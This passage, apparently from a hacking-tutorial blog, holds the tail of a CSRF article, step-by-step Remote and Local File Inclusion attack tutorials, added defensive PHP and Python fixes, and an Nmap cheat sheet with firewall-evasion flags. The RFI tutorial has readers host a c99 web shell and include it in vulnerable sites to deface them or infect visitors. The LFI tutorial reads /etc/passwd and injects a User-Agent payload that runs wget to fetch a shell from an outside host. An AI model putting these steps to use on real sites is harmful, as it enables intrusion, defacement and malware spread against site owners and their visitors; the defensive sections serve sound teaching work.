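    token = request.get("form", {}).get("csrf_token", "")
    if not verify_csrf_token(token, session_id, now):
        return 403, "missing or invalid CSRF token"
    new_password = request["form"].get("newpass", "")
    if len(new_password) < 12:
        return 400, "password too short"
    return 200, "password changed"
```

Setting the session cookie with the SameSite attribute adds a second, browser-enforced layer, since the cookie is then not attached to requests initiated from another origin.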

6) Conclusion

So what is a CSRF attack? A CSRF attack is an attack that can be performed with little effort, if you know what you're doing, and can do a lot of damage. Protecting against CSRF attacks is harder, but good to accomplish if you're working on, for example, a CMS.



Thank you(zer0w0rm) 
 

Remote File Inclusion For web application Pentesting

Hello, in this mini-tutorial I am going to show you how to use PHP shells such as c99 or other shells to hack/recover your website admin account or deface it, so it's for educational purposes ONLY.

OK, let's start.

Step 1 - Grab yourself a C99 shell from Here.

Step 2 - You need to find a free webhost to host it without your account being deleted. I prefer http://www.7host.com since they don't check your accounts.

Step 3 - Register on a free hosting site and upload the c99.php. Of course, if you're a PHP programmer, I suggest you password-protect it using this script.

Step 4 - Dorks to type into Google are: here

Some pages with certain other variables can be vulnerable too, but these are the most common. Such a page can look like inurl:?buy=car.php

Step 5 - To see if a site is vulnerable you can try this:

Imagine a link is:

http://yoursite.com/?link=http://yoursite.com/web.php

for testing you do:

http://yoursite.com/?link=http://google.com/index.php

If Google's index page also loads inside that page, then it's vulnerable.

Step 6 - If you find a vulnerable site, what you need to do is replace that link with the link to the C99 shell you uploaded on your free webhost:

http://yoursite.com/?link=http://you.somefreehost.com/c99.php

and wham! The C99 page is also loaded! You can now:

    Upload Files
    Delete Files
    Move Files
    Copy Files
    DOS the site
    Deface it
    Bruteforce FTP password
    Lag it
    Redirect visitors
    Install Drive-By's
    Grab Visitor Information and test exploitation on them
    Infect Visitors ( RAT - Keylogger - Stealer )
    Execute SQL commands
    Manage SQL accounts
    Execute PHP commands
    ...


End of Tutorial

OK, now how do you prevent RFI on your website or server?

RFI is caused by code like this:

<?php
$inc = $_GET['link'];
include($inc);
?>


To prevent that, we strip strings from the include parameter:

<?php
$inc = $_GET['link'];
// str_replace() returns the filtered string; it must be assigned back,
// otherwise the unfiltered value is still what gets passed to include().
$inc = str_replace(
    array("http://", "https://", "www.", ".php", ".html", ".", "/", "&", "'", ">",
          ".com", ".net", ".org", ".info", "etc", "passwd", "..", "..."),
    "",
    $inc
);
include($inc);
?>

This way the include page is not only no longer vulnerable to RFI but is also protected from many more hacking methods.
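A denylist like the one above is fragile; the usual fix is never to pass user input to include() at all, and instead map the parameter onto an allowlist of page names under one directory. The Python below is an added example for this page (not the tutorial's code) that applies both rules: it rejects the remote URL from this tutorial as well as the ../ traversal used in the Local File Inclusion tutorial that follows. The directory and page names are assumed.

```python
import os
from urllib.parse import urlsplit

# Assumed layout: every includable page lives here and is named in the allowlist.
PAGES_DIR = "/var/www/app/pages"
ALLOWED_PAGES = {"home", "contact", "about"}


def resolve_include(param):
    """Map the ?link= / ?page= value to a file under PAGES_DIR, or None if refused."""
    if not param or "\x00" in param:
        return None
    # Any URL scheme (http://, https://, ftp://, php://, data:) means remote or
    # wrapper inclusion: refuse outright instead of trying to strip prefixes.
    if urlsplit(param).scheme:
        return None
    name = param[:-4] if param.lower().endswith(".php") else param
    # Allowlist: the parameter may only select among known page names.
    if name not in ALLOWED_PAGES:
        return None
    # Containment check as a second layer: the resolved path must stay in PAGES_DIR.
    candidate = os.path.normpath(os.path.join(PAGES_DIR, name + ".php"))
    if os.path.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    return candidate


def render(param):
    """What the page handler does with the result: include the file or serve a 404."""
    path = resolve_include(param)
    return ("include", path) if path else ("404", None)
```

In PHP the same effect comes from setting allow_url_include=Off and looking the parameter up in an array of known pages before calling include().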


Thank you (zer0w0rm)
 

Local File Inclusion Injection For web application pentesting

THERE ARE 6 PARTS TO THIS TUTORIAL:


1 Introduction
2 Finding LFI VULN. WEBSITE
3 Checking if etc/passwd is accessible
4 Checking if proc/self/environ is accessible
5 Injecting malicious code
6 Access our shell


LET'S BEGIN....

1 Introduction

In this tutorial I show you how to upload a shell on websites using Local File Inclusion vulnerabilities and
injecting malicious code in proc/self/environ.


Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation.


This is a step-by-step tutorial.


2 Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website. Once we have found our target, let's check it.
FOR THAT I CAN PASTE HERE SOME GOOD GOOGLE DORKS; USING THEM YOU CAN FIND LFI VULNERABLE WEBSITES.

Dorks: here

YOU CAN FIND MANY WEBSITES BUT NOT ALL ARE LFI VULNERABLE... SO DON'T BE ANGRY,
BE COOL.

EXAMPLE: I FOUND A WEBSITE NAMED:

www.example.com/view.php?page=contact.php

NOW WE ARE GOING TO CHECK IF IT IS LFI VULNERABLE OR NOT. FOR THAT WE REPLACE contact.php WITH ../ SO THE URL BECOMES

www.example.com/view.php?page=../

AND WE GOT AN ERROR:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


IF YOU GET AN ERROR LIKE THIS, THEN IT IS LFI VULNERABLE... IF YOU GET NO ERROR OR A BLANK PAGE, THEN IT'S NOT LFI VULNERABLE...


3 Checking if etc/passwd is accessible
 

Now let's check for etc/passwd to see if it is Local File Inclusion vulnerable. Let's make a request:

www.example.com/view.php?page=../../../etc/passwd


We got an error and no etc/passwd file:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337


SO WE GO MORE DIRECTORIES UP:

www.example.com/view.php?page=../../../../../etc/passwd


We successfully included the etc/passwd file:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin


THERE ARE ALSO OTHER FILES WORTH CHECKING:

/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default


4 Checking if proc/self/environ is accessible

- Now let's see if proc/self/environ is accessible. We replace etc/passwd with proc/self/environ:

www.example.com/view.php?page=../../../../../proc/self/environ


IF YOU GET SOMETHING LIKE THIS:

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=../../../../../../proc/self/environ
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=../../../../../../proc/self/environ
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80



then proc/self/environ is accessible. If you get a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

5 Injecting malicious code

- Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code through the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:

www.example.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in the User-Agent field write the following code (TAMPER DATA IS AN ADD-ON FOR MOZILLA FIREFOX... JUST GOOGLE IT AND YOU'LL FIND IT):

<?system('wget http://www.zer0w0rm.com/web/username/your shellname.txt -O shell.php');?>


Our command will be executed (it will download the txt shell from http://www.zer0w0rm.com/Shells/gny.txt and save it as shell.php in the
website directory) through system(), and our shell will be created.
If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

HERE "http://www.zer0w0rm.com/web/username/your shellname.txt" IS THE LOCATION OF YOUR SHELL, WHICH YOU HAVE TO PUT IN A TXT FILE.

IT IS NOT NECESSARY TO UPLOAD YOUR SHELL ON DRIVE HQ...

WHAT THIS CODE DOES IS COPY YOUR TXT FILE ONTO THE LFI VULNERABLE WEBSITE AS shell.php


6 Access our shell

- Now let's check whether our malicious code was successfully injected. Let's check if the shell is present:

www.example.com/shell.php

OUR SHELL IS THERE, THE INJECTION WAS SUCCESSFUL....
IF THE SHELL IS NOT THERE, THEN TRY ANOTHER WEBSITE...
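For contrast, here is a hardened replacement for both the blacklist str_replace() filter shown earlier and the view.php?page= include that this tutorial exploits. This is an added example, not code from the original posts: user input selects a page key from an allow-list instead of a path, and a realpath() containment check is shown as a second layer for sites where the page set is not fixed. The pages/ directory and the home/contact/about file names are assumed.

```php
<?php
// Added example, not code from the original tutorial. Replaces the
// include($_GET['page']) pattern that the LFI and RFI walkthroughs exploit.
// Assumed layout: the includable pages live in ./pages/ next to this script.

// Control 1: allow-list. The request parameter selects a key; the path on
// disk is chosen by the application, so "../", "/proc/self/environ",
// "php://" wrappers and remote URLs never reach include().
function allowed_pages(): array
{
    return [
        'home'    => 'home.php',
        'contact' => 'contact.php',
        'about'   => 'about.php',
    ];
}

function include_page(string $key): void
{
    $pages = allowed_pages();
    if (!array_key_exists($key, $pages)) {
        http_response_code(404);
        exit('Unknown page');
    }
    include __DIR__ . '/pages/' . $pages[$key];
}

// Control 2: canonical-path containment, for when the set of pages is not
// fixed. The name is limited to a safe character set (this alone rejects
// traversal and absolute paths), then realpath() resolves symlinks and the
// result must still lie under the template directory.
function resolve_template(string $name, string $baseDir): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;                      // missing directory or file
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                      // resolved outside $baseDir
    }
    return $path;
}

// Defence in depth in php.ini: allow_url_include=Off (blocks RFI entirely)
// and open_basedir restricting what include() and file functions may read.
include_page($_GET['page'] ?? 'home');
```

Either control on its own stops the traversal and the proc/self/environ trick shown above; the blacklist approach fails because it tries to enumerate bad input instead of defining good input.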


Thank you (zer0w0rm)
 

Nmap Cheat Sheet

Basic Scanning Techniques

Scan a Single Target
nmap [target]

Scan Multiple Targets
nmap [target1, target2, etc]

Scan a List of Targets
nmap -iL [list.txt]

Scan a Range of Hosts
nmap [range of ip addresses]

Scan an Entire Subnet
nmap [ip address/cidr]

Scan Random Hosts
nmap -iR [number]

Excluding Targets from a Scan
nmap [targets] --exclude [targets]

Excluding Targets Using a List
nmap [targets] --excludefile [list.txt]

Perform an Aggressive Scan
nmap -A [target]

Scan an IPv6 Target
nmap -6 [target]


Discovery Options

Perform a Ping Only Scan
nmap -sP [target]

Don’t Ping
nmap -PN [target]

TCP SYN Ping
nmap -PS [target]

TCP ACK Ping
nmap -PA [target]

UDP Ping
nmap -PU [target]

SCTP INIT Ping
nmap -PY [target]

ICMP Echo Ping
nmap -PE [target]

ICMP Timestamp Ping
nmap -PP [target]

ICMP Address Mask Ping
nmap -PM [target]

IP Protocol Ping
nmap -PO [target]

ARP Ping
nmap -PR [target]

Traceroute
nmap --traceroute [target]

Force Reverse DNS Resolution
nmap -R [target]

Disable Reverse DNS Resolution
nmap -n [target]

Alternative DNS Lookup 
nmap --system-dns [target]

Manually Specify DNS Server(s)
nmap --dns-servers [servers] [target]

Create a Host List
nmap -sL [targets]

Advanced Scanning Functions

TCP SYN Scan
nmap -sS [target]

TCP Connect Scan
nmap -sT [target]

UDP Scan
nmap -sU [target]

TCP NULL Scan
nmap -sN [target]

TCP FIN Scan
nmap -sF [target]

Xmas Scan
nmap -sX [target]

TCP ACK Scan
nmap -sA [target]

Custom TCP Scan
nmap --scanflags [flags] [target]

IP Protocol Scan
nmap -sO [target]

Send Raw Ethernet Packets
nmap --send-eth [target]

Send IP Packets
nmap --send-ip [target]

Port Scanning Options


Perform a Fast Scan
nmap -F [target]

Scan Specific Ports
nmap -p [port(s)] [target]

Scan Ports by Name
nmap -p [port name(s)] [target]

Scan Ports by Protocol
nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan All Ports
nmap -p "*" [target]

Scan Top Ports
nmap --top-ports [number] [target]

Perform a Sequential Port Scan
nmap -r [target]

Version Detection

Operating System Detection
nmap -O [target]

Submit TCP/IP Fingerprints
www.nmap.org/submit/

Attempt to Guess an Unknown OS
nmap -O --osscan-guess [target]

Service Version Detection
nmap -sV [target]

Troubleshooting Version Scans
nmap -sV --version-trace [target]

Perform a RPC Scan
nmap -sR [target]

Timing Options

Timing Templates
nmap -T[0-5] [target]

Set the Packet TTL
nmap --ttl [time] [target]

Minimum Number of Parallel Operations
nmap --min-parallelism [number] [target]

Maximum Number of Parallel Operations
nmap --max-parallelism [number] [target]

Minimum Host Group Size
nmap --min-hostgroup [number] [targets]

Maximum Host Group Size
nmap --max-hostgroup [number] [targets]

Initial RTT Timeout
nmap --initial-rtt-timeout [time] [target]

Maximum RTT Timeout
nmap --max-rtt-timeout [time] [target]

Maximum Retries
nmap --max-retries [number] [target]

Host Timeout
nmap --host-timeout [time] [target]

Minimum Scan Delay
nmap --scan-delay [time] [target]

Maximum Scan Delay
nmap --max-scan-delay [time] [target]

Minimum Packet Rate
nmap --min-rate [number] [target]

Maximum Packet Rate
nmap --max-rate [number] [target]

Defeat Reset Rate Limits
nmap --defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment Packets
nmap -f [target]

Specify a Specific MTU
nmap --mtu [MTU] [target]

Use a Decoy
nmap -D RND:[number] [target]

Idle Zombie Scan
nmap -sI [zombie] [target]

Manually Specify a Source Port 
nmap --source-port [port] [target]

Append Random Data
nmap --data-length [size] [target]

Randomize Target Scan Order
nmap --randomize-hosts [target]

Spoof MAC Address
nmap --spoof-mac [MAC|0|vendor] [target]

Send Bad Checksums
nmap --badsum [target]

Output Options

Save Output to a Text File
nmap -oN [scan.txt] [target]

Save Output to a XML File
nmap -oX [scan.xml] [target]

Grepable Output
nmap -oG [scan.txt] [targets]

Output All Supported File Types
nmap -oA [path/filename] [target]

Periodically Display Statistics
nmap --stats-every [time] [target]

133t Output
nmap -oS [scan.txt] [target]


Troubleshooting and Debugging

Getting Help
nmap -h

Display Nmap Version
nmap -V

Verbose Output
nmap -v [target]

Debugging
nmap -d [target]

Display Port State Reason
nmap --reason [target]

Only Display Open Ports
nmap --open [target]

Trace Packets
nmap --packet-trace [target]

Display Host Networking 
nmap --iflist

Specify a Network Interface
nmap -e [interface] [target]

Nmap Scripting Engine

Execute Individual Scripts
nmap --script [script.nse] [target]

Execute Multiple Scripts
nmap --script [expression] [target]

Script Categories
all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute Scripts by Category
nmap --script [category] [target]

Execute Multiple Script Categories
nmap --script [category1,category2,etc] [target]

Troubleshoot Scripts
nmap --script [script] --script-trace [target]

Update the Script Database
nmap --script-updatedb

Ndiff

Comparison Using Ndiff
ndiff [scan1.xml] [scan2.xml]

Ndiff Verbose Mode
ndiff -v [scan1.xml] [scan2.xml]

XML Output Mode
ndiff --xml [scan1.xml] [scan2.xml]


Thank you (zer0w0rm)